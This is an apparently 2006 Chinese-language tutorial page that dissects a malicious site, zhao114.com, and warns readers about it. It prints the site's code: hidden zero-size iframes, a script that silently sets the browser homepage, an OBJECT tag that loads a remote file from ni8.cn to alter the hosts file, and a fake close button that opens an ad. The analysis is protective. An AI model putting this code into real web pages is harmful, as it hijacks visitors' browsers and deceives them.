网站恶意代码,恶意网站zhao114代码的剖析

恶意网站zhao114代码的剖析 - 网络安全 - 电脑教程网

恶意网站zhao114代码的剖析

日期:2006-04-09   荐:

精通系统安全防范十大技巧·四个小麻雀迷你软件保安全·IE与Mozilla惊现多个高危漏洞

微软最新安全漏洞大揭秘·目前已知的38个超恶性网站名单

早就听说了某些网站的恶意代码,没想到愚人节让我碰上一回,一个朋友说道zhao114.com怎么火爆,我就好奇看了眼,简单的网址站,但是弹出另外的网页,开始没大在意,后来发现,这个网站居然修改默认主页、修改Hosts文件、添加桌面,另外还使用一些页面欺骗的手法。好奇之下就分析了一下他的源码,列出如下,请大家小心了:

1) IE防止不住弹出窗口的方法

该网站无数次采用

<iframe src="网址" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>

的方式弹出新窗口,包含广告和病毒代码。

2) 不提示设置首页弹出一个js文件(setmyhome.js)

主要代码是下面的sethome()函数

<!--function GetCookie (name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return getCookieVal (j); i = document.cookie.indexOf(" ", i) + 1; if (i == 0) break; } return null;} function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var eXPires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + "=" + escape (value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : "");} function DeleteCookie (name) { var exp = new Date(); exp.setTime (exp.getTime() - 1); // This cookie is history var cval = 0; document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();} //设置cookies时间,自己根据情况设置。var expDays = 1;//这里设为 1 天var exp = new Date(); exp.setTime(exp.getTime() + (expDays*24*60*60*1000)); function amt(){var count = GetCookie('count'); //同一ip只显示一次//var count;//同一ip只显示N次//alert(count);//count = null;if(count == null) {SetCookie('count','1')return 1}else{var newcount = parseInt(count) + 1;if(newcount<2) count=1;SetCookie('count',newcount,exp);//DeleteCookie('count')return newcount}} function getCookieVal(offset) {var endstr = document.cookie.indexOf (";", offset);if (endstr == -1)endstr = document.cookie.length;return unescape(document.cookie.substring(offset, endstr));} function sethome(){document.links[0].style.behavior='url(#default#homepage)';document.links[0].setHomePage('http://www.zhao114.com');} if(amt()==1){sethome()}//-->
[1] [2]  

3) 强行修改hosts文件(in yan88.htm)<script src="../ads/banner.js"></script>(in banner.htm)<IFRAME border=0 marginWidth=0 marginHeight=0 src="banner_files/wo.htm" frameBorder=no width=0 scrolling=no height=0></IFRAME>(in wo.htm)<OBJECT height=0 width=0 data=http://www.ni8.cn/set/setdns.chtm></OBJECT>(in setdns.chtm)这就是代码

4) 页面欺骗页面右边出现一个浮动广告,告诉别人有短消息,点X位置不是关闭,反而使点击广告了(中计)。

代码如下:

<SPAN title=关闭 style="FONT-WEIGHT: bold; FONT-SIZE: 12px; CURSOR: hand; COLOR: red; MARGIN-RIGHT: 4px" onclick="javascript:closeDiv();window.open('http://www.zhao114.com/v.htm')">×</SPAN>

另外,他添加桌面的方式我就没有时间研究了,留给有兴趣的朋友,不过研究之前千万小心,最好先Ghost一个备份。另外,这里有一个目前已知的38个超恶性网站的列表,大家需要小心了。感染了的朋友,可以到3721下载一个上网助手2005迅速解决问题。 更多内容请看网站服务器的选型专题,或

(出处:http://www.sheup.com)


 [1] [2] 

标签: